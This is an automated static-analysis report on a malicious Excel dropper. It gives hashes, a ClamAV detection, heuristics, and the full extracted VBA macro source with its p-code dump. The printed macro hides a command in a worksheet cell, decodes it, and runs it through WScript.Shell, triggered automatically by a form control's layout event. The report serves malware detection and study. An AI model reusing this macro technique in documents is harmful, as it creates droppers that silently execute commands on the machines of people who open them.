Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 15d3edcf37b1e4d0…

MALICIOUS

Office (OLE)

79.0 KB Created: 2020-03-11 13:13:34 Authoring application: Microsoft Excel First seen: 2020-07-24
MD5: de2b9c76f2714b136fba35b0f5814e0a SHA-1: a4b003322d338ef1b5b48ddb702340a1abef7d63 SHA-256: 15d3edcf37b1e4d03a5c61c1c7752130a9899b978c94f80d8dabc45f416fc253
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Excel document containing VBA macros that utilize WScript.Shell and the Shell() function to execute commands. The document body attempts to lure the user into engaging with the content, likely to encourage macro execution. The ClamAV detection indicates it is a known dropper.

Heuristics 5

  • ClamAV: Xls.Dropper.Agent-7617649-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7617649-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim oh As Object
    Set oh = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim oh As Object
    Set oh = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4293 bytes
SHA-256: ddfbe874649b0f7ceefcd34ce195d19c653ac5d8f3b6e3459262f267193ff4c0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function text(k, kk, aA As Integer)
Dim s(): Dim u As Integer
x = Cells(k, kk)
For ci = 1 To Len(x)
    ReDim Preserve s(ci)
    s(ci) = Mid(x, ci, 1)
Next
textx = ""
For u = 0 To aA Step 4
textx = textx + s(u)
Next u
text = textx
End Function
Public Function Sdf(sCmd As String) As String


    Dim oh As Object
    Set oh = CreateObject("WScript.Shell")

    Dim co As Object
    Dim vre As Object
    Set co = oh.Exec(sCmd)
    Set vre = co.StdOut

    Dim s As String
    Dim sLine As String
    While Not vre.AtEndOfStream
        sLine = vre.ReadLine
        If sLine <> "" Then s = s & sLine & vbCrLf
    Wend

    Sdf = s

End Function
Function vess()
Debug.Print "" & "\n" & Sdf(text(200, 10, 13748)) '& vbCrLf
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "i, 1, 0, MSForms, Frame"
Attribute VB_Control = "Preview, 3, 1, MSForms, CommandButton"
Private Sub i_Layout()
ThisWorkbook.vess
End Sub

Private Sub Preview_Click()
ThisWorkbook.vess
End Sub

' Processing file: /tmp/qstore_1hfmrl3y
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 3425 bytes
' Line #0:
' 	FuncDefn (Function Text(k))
' Line #1:
' 	Dim 
' 	VarDefn s
' 	BoS 0x0000 
' 	Dim 
' 	VarDefn u (As Integer)
' Line #2:
' 	Ld k 
' 	Ld kk 
' 	ArgsLd Cells 0x0002 
' 	St x 
' Line #3:
' 	StartForVariable 
' 	Ld ci 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld x 
' 	FnLen 
' 	For 
' Line #4:
' 	OptionBase 
' 	Ld ci 
' 	Redim (Preserve) s 0x0001 (As Variant)
' Line #5:
' 	Ld x 
' 	Ld ci 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	Ld ci 
' 	ArgsSt s 0x0001 
' Line #6:
' 	StartForVariable 
' 	Next 
' Line #7:
' 	LitStr 0x0000 ""
' 	St textx 
' Line #8:
' 	StartForVariable 
' 	Ld u 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld aA 
' 	LitDI2 0x0004 
' 	ForStep 
' Line #9:
' 	Ld textx 
' 	Ld u 
' 	ArgsLd s 0x0001 
' 	Add 
' 	St textx 
' Line #10:
' 	StartForVariable 
' 	Ld u 
' 	EndForVariable 
' 	NextVar 
' Line #11:
' 	Ld textx 
' 	St Text 
' Line #12:
' 	EndFunc 
' Line #13:
' 	FuncDefn (Public Function Sdf(sCmd As String) As String)
' Line #14:
' Line #15:
' Line #16:
' 	Dim 
' 	VarDefn oh (As Object)
' Line #17:
' 	SetStmt 
' 	LitStr 0x000D "WScript.Shell"
' 	ArgsLd CreateObject 0x0001 
' 	Set oh 
' Line #18:
' Line #19:
' 	Dim 
' 	VarDefn co (As Object)
' Line #20:
' 	Dim 
' 	VarDefn vre (As Object)
' Line #21:
' 	SetStmt 
' 	Ld sCmd 
' 	Ld oh 
' 	ArgsMemLd Exec 0x0001 
' 	Set co 
' Line #22:
' 	SetStmt 
' 	Ld co 
' 	MemLd StdOut 
' 	Set vre 
' Line #23:
' Line #24:
' 	Dim 
' 	VarDefn s (As String)
' Line #25:
' 	Dim 
' 	VarDefn sLine (As String)
' Line #26:
' 	Ld vre 
' 	MemLd AtEndOfStream 
' 	Not 
' 	While 
' Line #27:
' 	Ld vre 
' 	MemLd ReadLine 
' 	St sLine 
' Line #28:
' 	Ld sLine 
' 	LitStr 0x0000 ""
' 	Ne 
' 	If 
' 	BoSImplicit 
' 	Ld s 
' 	Ld sLine 
' 	Concat 
' 	Ld vbCrLf 
' 	Concat 
' 	St s 
' 	EndIf 
' Line #29:
' 	Wend 
' Line #30:
' Line #31:
' 	Ld s 
' 	St Sdf 
' Line #32:
' Line #33:
' 	EndFunc 
' Line #34:
' 	FuncDefn (Function vess(id_FFFE As Variant))
' Line #35:
' 	Debug 
' 	PrintObj 
' 	LitStr 0x0000 ""
' 	LitStr 0x0002 "\n"
' 	Concat 
' 	LitDI2 0x00C8 
' 	LitDI2 0x000A 
' 	LitDI2 0x35B4 
' 	ArgsLd Text 0x0003 
' 	ArgsLd Sdf 0x0001 
' 	Concat 
' 	PrintItemNL 
' 	QuoteRem 0x0032 0x0008 "& vbCrLf"
' Line #36:
' 	EndFunc 
' Line #37:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 1857 bytes
' Line #0:
' 	FuncDefn (Sub i_Layout())
' Line #1:
' 	Ld ThisWorkbook 
' 	ArgsMemCall vess 0x0000 
' Line #2:
' 	EndSub 
' Line #3:
' Line #4:
' 	FuncDefn (Sub Preview_Click())
' Line #5:
' 	Ld ThisWorkbook 
' 	ArgsMemCall vess 0x0000 
' Line #6:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.